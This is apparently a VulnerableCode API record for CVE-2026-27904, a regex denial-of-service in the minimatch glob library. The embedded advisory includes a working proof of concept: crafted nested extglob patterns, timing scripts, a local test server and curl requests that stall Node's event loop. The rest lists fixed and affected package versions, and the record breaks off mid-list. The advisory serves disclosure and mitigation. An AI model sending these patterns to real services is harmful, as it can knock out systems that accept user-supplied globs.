Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/22344?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/22344?format=api", "vulnerability_id": "VCID-kq3k-xr3z-z3c4", "summary": "minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions\n### Summary\n\nNested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally.\n\n---\n\n### Details\n\nThe root cause is in `AST.toRegExpSource()` at [`src/ast.ts#L598`](https://github.com/isaacs/minimatch/blob/v10.2.2/src/ast.ts#L598). For the `*` extglob type, the close token emitted is `)*` or `)?`, wrapping the recursive body in `(?:...)*`. When extglobs are nested, each level adds another `*` quantifier around the previous group:\n\n```typescript\n: this.type === '*' && bodyDotAllowed ? `)?`\n: `)${this.type}`\n```\n\nThis produces the following regexps:\n\n| Pattern | Generated regex |\n|----------------------|------------------------------------------|\n| `*(a\\|b)` | `/^(?:a\\|b)*$/` |\n| `*(*(a\\|b))` | `/^(?:(?:a\\|b)*)*$/` |\n| `*(*(*(a\\|b)))` | `/^(?:(?:(?:a\\|b)*)*)*$/` |\n| `*(*(*(*(a\\|b))))` | `/^(?:(?:(?:(?:a\\|b)*)*)*)*$/` |\n\nThese are textbook nested-quantifier patterns. Against an input of repeated `a` characters followed by a non-matching character `z`, V8's backtracking engine explores an exponential number of paths before returning `false`.\n\nThe generated regex is stored on `this.set` and evaluated inside `matchOne()` at [`src/index.ts#L1010`](https://github.com/isaacs/minimatch/blob/v10.2.2/src/index.ts#L1010) via `p.test(f)`. It is reached through the standard `minimatch()` call with no configuration.\n\nMeasured times via `minimatch()`:\n\n| Pattern | Input | Time |\n|----------------------|--------------------|------------|\n| `*(*(a\\|b))` | `a` x30 + `z` | ~68,000ms |\n| `*(*(*(a\\|b)))` | `a` x20 + `z` | ~124,000ms |\n| `*(*(*(*(a\\|b))))` | `a` x25 + `z` | ~116,000ms |\n| `*(a\\|a)` | `a` x25 + `z` | ~2,000ms |\n\nDepth inflection at fixed input `a` x16 + `z`:\n\n| Depth | Pattern | Time |\n|-------|----------------------|--------------|\n| 1 | `*(a\\|b)` | 0ms |\n| 2 | `*(*(a\\|b))` | 4ms |\n| 3 | `*(*(*(a\\|b)))` | 270ms |\n| 4 | `*(*(*(*(a\\|b))))` | 115,000ms |\n\nGoing from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.\n\n---\n\n### PoC\n\nTested on minimatch@10.2.2, Node.js 20.\n\n**Step 1 -- verify the generated regexps and timing (standalone script)**\n\nSave as `poc4-validate.mjs` and run with `node poc4-validate.mjs`:\n\n```javascript\nimport { minimatch, Minimatch } from 'minimatch'\n\nfunction timed(fn) {\n const s = process.hrtime.bigint()\n let result, error\n try { result = fn() } catch(e) { error = e }\n const ms = Number(process.hrtime.bigint() - s) / 1e6\n return { ms, result, error }\n}\n\n// Verify generated regexps\nfor (let depth = 1; depth <= 4; depth++) {\n let pat = 'a|b'\n for (let i = 0; i < depth; i++) pat = `*(${pat})`\n const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()\n console.log(`depth=${depth} \"${pat}\" -> ${re}`)\n}\n// depth=1 \"*(a|b)\" -> /^(?:a|b)*$/\n// depth=2 \"*(*(a|b))\" -> /^(?:(?:a|b)*)*$/\n// depth=3 \"*(*(*(a|b)))\" -> /^(?:(?:(?:a|b)*)*)*$/\n// depth=4 \"*(*(*(*(a|b))))\" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/\n\n// Safe-length timing (exponential growth confirmation without multi-minute hang)\nconst cases = [\n ['*(*(*(a|b)))', 15], // ~270ms\n ['*(*(*(a|b)))', 17], // ~800ms\n ['*(*(*(a|b)))', 19], // ~2400ms\n ['*(*(a|b))', 23], // ~260ms\n ['*(a|b)', 101], // <5ms (depth=1 control)\n]\nfor (const [pat, n] of cases) {\n const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))\n console.log(`\"${pat}\" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)\n}\n\n// Confirm noext disables the vulnerability\nconst t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))\nconsole.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)\n\n// +() is equally affected\nconst t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))\nconsole.log(`\"+(+(+(a|b)))\" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)\n```\n\nObserved output:\n```\ndepth=1 \"*(a|b)\" -> /^(?:a|b)*$/\ndepth=2 \"*(*(a|b))\" -> /^(?:(?:a|b)*)*$/\ndepth=3 \"*(*(*(a|b)))\" -> /^(?:(?:(?:a|b)*)*)*$/\ndepth=4 \"*(*(*(*(a|b))))\" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/\n\"*(*(*(a|b)))\" n=15: 269ms result=false\n\"*(*(*(a|b)))\" n=17: 268ms result=false\n\"*(*(*(a|b)))\" n=19: 2408ms result=false\n\"*(*(a|b))\" n=23: 257ms result=false\n\"*(a|b)\" n=101: 0ms result=false\nnoext=true: 0ms (should be ~0ms)\n\"+(+(+(a|b)))\" n=18: 6300ms result=false\n```\n\n**Step 2 -- HTTP server (event loop starvation proof)**\n\nSave as `poc4-server.mjs`:\n\n```javascript\nimport http from 'node:http'\nimport { URL } from 'node:url'\nimport { minimatch } from 'minimatch'\n\nconst PORT = 3001\nhttp.createServer((req, res) => {\n const url = new URL(req.url, `http://localhost:${PORT}`)\n const pattern = url.searchParams.get('pattern') ?? ''\n const path = url.searchParams.get('path') ?? ''\n\n const start = process.hrtime.bigint()\n const result = minimatch(path, pattern)\n const ms = Number(process.hrtime.bigint() - start) / 1e6\n\n console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern=\"${pattern}\" path=\"${path.slice(0,30)}\"`)\n res.writeHead(200, { 'Content-Type': 'application/json' })\n res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\\n')\n}).listen(PORT, () => console.log(`listening on ${PORT}`))\n```\n\nTerminal 1 -- start the server:\n```\nnode poc4-server.mjs\n```\n\nTerminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:\n```\ncurl \"http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz\" &\n```\n\nTerminal 3 -- send a benign request while the attack is in-flight:\n```\ncurl -w \"\\ntime_total: %{time_total}s\\n\" \"http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz\"\n```\n\n**Observed output -- Terminal 2 (attack):**\n```\n{\"result\":false,\"ms\":\"64149\"}\n```\n\n**Observed output -- Terminal 3 (benign, concurrent):**\n```\n{\"result\":false,\"ms\":\"0\"}\n\ntime_total: 63.022047s\n```\n\n**Terminal 1 (server log):**\n```\n[2026-02-20T09:41:17.624Z] pattern=\"*(*(*(a|b)))\" path=\"aaaaaaaaaaaaaaaaaaaz\"\n[2026-02-20T09:42:21.775Z] done in 64149ms result=false\n[2026-02-20T09:42:21.779Z] pattern=\"*(a|b)\" path=\"aaaz\"\n[2026-02-20T09:42:21.779Z] done in 0ms result=false\n```\n\nThe server reports `\"ms\":\"0\"` for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second `time_total` is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.\n\nNote: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.\n\n---\n\n### Impact\n\nAny context where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.\n\nDepth 3 (`*(*(*(a|b)))`, 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (`*(*(a|b))`, 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.\n\n`+()` extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).\n\n**Mitigation available:** passing `{ noext: true }` to `minimatch()` disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.", "aliases": [ { "alias": "CVE-2026-27904" }, { "alias": "GHSA-23c5-xmqv-rm74" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1041980?format=api", "purl": "pkg:deb/debian/node-minimatch@9.0.7-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@9.0.7-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054011?format=api", "purl": "pkg:deb/debian/node-minimatch@9.0.7-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@9.0.7-1" }, { "url": "http://public2.vulnerablecode.io/api/packages/64949?format=api", "purl": "pkg:npm/minimatch@3.1.4", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/63551?format=api", "purl": "pkg:npm/minimatch@4.2.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/63547?format=api", "purl": "pkg:npm/minimatch@5.1.8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/63543?format=api", "purl": "pkg:npm/minimatch@6.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/63541?format=api", "purl": "pkg:npm/minimatch@7.4.8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.4.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/63539?format=api", "purl": "pkg:npm/minimatch@8.0.6", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@8.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/63536?format=api", "purl": "pkg:npm/minimatch@9.0.7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@9.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/63533?format=api", "purl": "pkg:npm/minimatch@10.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@10.2.3" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1054008?format=api", "purl": "pkg:deb/debian/node-minimatch@3.0.4%2B~3.0.3-1%2Bdeb11u2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@3.0.4%252B~3.0.3-1%252Bdeb11u2" }, { "url": "http://public2.vulnerablecode.io/api/packages/932417?format=api", "purl": "pkg:deb/debian/node-minimatch@3.0.4%2B~3.0.3-1%2Bdeb11u2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@3.0.4%252B~3.0.3-1%252Bdeb11u2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/932415?format=api", "purl": "pkg:deb/debian/node-minimatch@5.1.1%2B~5.1.2-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@5.1.1%252B~5.1.2-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054009?format=api", "purl": "pkg:deb/debian/node-minimatch@5.1.1%2B~5.1.2-1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@5.1.1%252B~5.1.2-1" }, { "url": "http://public2.vulnerablecode.io/api/packages/932418?format=api", "purl": "pkg:deb/debian/node-minimatch@9.0.3-6?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@9.0.3-6%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054010?format=api", "purl": "pkg:deb/debian/node-minimatch@9.0.3-6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-minimatch@9.0.3-6" }, { "url": "http://public2.vulnerablecode.io/api/packages/155761?format=api", "purl": "pkg:npm/minimatch@0.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/155762?format=api", "purl": "pkg:npm/minimatch@0.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/155763?format=api", "purl": "pkg:npm/minimatch@0.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/155764?format=api", "purl": "pkg:npm/minimatch@0.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/155765?format=api", "purl": "pkg:npm/minimatch@0.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/155766?format=api", "purl": "pkg:npm/minimatch@0.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/155767?format=api", "purl": "pkg:npm/minimatch@0.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/155768?format=api", "purl": "pkg:npm/minimatch@0.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/155769?format=api", "purl": "pkg:npm/minimatch@0.1.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/155770?format=api", "purl": "pkg:npm/minimatch@0.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155771?format=api", "purl": "pkg:npm/minimatch@0.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/155772?format=api", "purl": "pkg:npm/minimatch@0.2.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/155773?format=api", "purl": "pkg:npm/minimatch@0.2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/155774?format=api", "purl": "pkg:npm/minimatch@0.2.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/155775?format=api", "purl": "pkg:npm/minimatch@0.2.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/155776?format=api", "purl": "pkg:npm/minimatch@0.2.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/155777?format=api", "purl": "pkg:npm/minimatch@0.2.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/155778?format=api", "purl": "pkg:npm/minimatch@0.2.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/155779?format=api", "purl": "pkg:npm/minimatch@0.2.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/155780?format=api", "purl": "pkg:npm/minimatch@0.2.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.11" }, { "url": "http://public2.vulnerablecode.io/api/packages/155781?format=api", "purl": "pkg:npm/minimatch@0.2.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.12" }, { "url": "http://public2.vulnerablecode.io/api/packages/155782?format=api", "purl": "pkg:npm/minimatch@0.2.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.13" }, { "url": "http://public2.vulnerablecode.io/api/packages/155783?format=api", "purl": "pkg:npm/minimatch@0.2.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.2.14" }, { "url": "http://public2.vulnerablecode.io/api/packages/155784?format=api", "purl": "pkg:npm/minimatch@0.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155785?format=api", "purl": "pkg:npm/minimatch@0.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@0.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155786?format=api", "purl": "pkg:npm/minimatch@1.0.0", "is_vulnerable": true, 